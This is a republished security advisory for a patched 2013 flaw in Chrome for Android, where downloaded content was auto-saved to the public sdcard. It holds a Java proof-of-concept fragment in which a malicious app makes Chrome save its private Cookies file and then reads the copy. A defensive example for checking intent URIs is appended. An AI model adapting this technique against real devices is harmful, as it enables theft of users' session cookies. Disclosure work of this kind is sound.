
Chrome For Android Download Function Information Disclosure

Published: 08 Jan 2013. Reported by: Takeshi Terada. Type: packetstorm. Source: packetstormsecurity.com

Chrome Android Download Info Disclosure CVE-2012-490

`CVE Number: CVE-2012-4906  
Title: Chrome for Android - Download Function Information Disclosure  
Affected Software: Confirmed on Chrome for Android v18.0.1025123  
Credit: Takeshi Terada  
Issue Status: v18.0.1025308 was released which fixes this vulnerability  
  
Overview:  
Rogue Android apps can steal private information, such as Chrome's Cookies file,  
by abusing the automatic download functionality of Chrome for Android.  
  
Details:  
When Chrome for Android (v18.0.1025123) loads non-renderable content such as  
binary files, it automatically saves that content to a public location (sdcard)  
without asking the user whether they wish to do so.  
  
Therefore, malicious Android apps can steal such content by the following method.  
  
1. A malicious app forces Chrome to load such content.  
2. Chrome automatically saves it to the sdcard.  
3. The malicious app reads the downloaded file from the sdcard.  
  
By this method, malicious apps can gain access to both local content, such as  
the Cookies file of Chrome, and possibly online content.  
  
Such behavior of Chrome does not matter in the PC world, but it does in the Android  
world, because the two have different security models.  
  
Proof of Concept:  
// This is a part of malicious Android app.  
public void attack() {  
    try {  
        // let Chrome app load its Cookies file, so that Chrome app  
        // automatically save it to /sdcard/Download/ directory.  
        Intent intent = new Intent("android.intent.action.VIEW");  
        intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");  
        intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));  
        startActivity(intent);  
  
        // wait a few seconds  
        Thread.sleep(3000);  
  
        // read the Cookie file (/sdcard/Download/Cookies.bin)  
        FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");  
        ...  
    } catch (Exception e) {  
        // error handling is not shown in the original snippet  
    }  
}  
  
Timeline:  
2012/07/07 Reported to Google security team  
2012/08/25 Re-reported to Chrome security team  
2012/09/12 Vendor announced v18.0.1025308  
2013/01/07 Disclosure of this advisory  
  
Recommendation:  
Upgrade to the latest version.  
  
Reference:  
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html  
https://code.google.com/p/chromium/issues/detail?id=144820  
`
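
A receiving-side check for the pattern the advisory describes, as an added example (not code from the advisory or from Chrome, and not a description of how the issue was fixed): before an exported activity loads a URI supplied by another app's VIEW intent, it rejects `file:` targets that resolve inside its own private data directory. The class and method names are hypothetical, the allow/deny policy is an assumption, and it is written in plain Java so it runs off-device; on Android the directory would come from `getApplicationInfo().dataDir`.

```java
import java.io.File;
import java.io.IOException;
import java.net.URI;

/** Added example: vetting the URI of an externally supplied VIEW intent. */
public class IntentUriGuard {
    // Assumption: the app passes in its own private data directory.
    private final File privateDir;

    public IntentUriGuard(String privateDirPath) throws IOException {
        this.privateDir = new File(privateDirPath).getCanonicalFile();
    }

    /** Returns true only if the URI may be loaded on behalf of another app. */
    public boolean isAllowed(String rawUri) {
        final URI uri;
        try {
            uri = new URI(rawUri).normalize();
        } catch (Exception e) {
            return false;                         // unparsable input: fail closed
        }
        String scheme = uri.getScheme();
        if (scheme == null) return false;
        if (scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https")) return true;
        // Any other non-file scheme is rejected by this (assumed) policy.
        if (!scheme.equalsIgnoreCase("file") || uri.getPath() == null) return false;
        try {
            // Canonicalize so "../" segments and symlinks cannot hide the real target.
            File target = new File(uri.getPath()).getCanonicalFile();
            for (File f = target; f != null; f = f.getParentFile()) {
                if (f.equals(privateDir)) return false;   // inside private storage
            }
            return true;
        } catch (IOException e) {
            return false;
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample inputs; the directory mirrors the path in the advisory.
        IntentUriGuard guard = new IntentUriGuard("/data/data/com.android.chrome");
        String[] samples = {
            "file:///data/data/com.android.chrome/app_chrome/Default/Cookies",
            "file:///sdcard/../data/data/com.android.chrome/app_chrome/Default/Cookies",
            "file:///sdcard/Download/report.pdf",
            "https://example.com/file.bin" };
        for (String s : samples)
            System.out.println((guard.isAllowed(s) ? "ALLOW " : "BLOCK ") + s);
    }
}
```

A check like this covers only the intent entry point; content that is legitimately downloaded still needs to land in app-private storage or behind a user prompt rather than on shared external storage.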
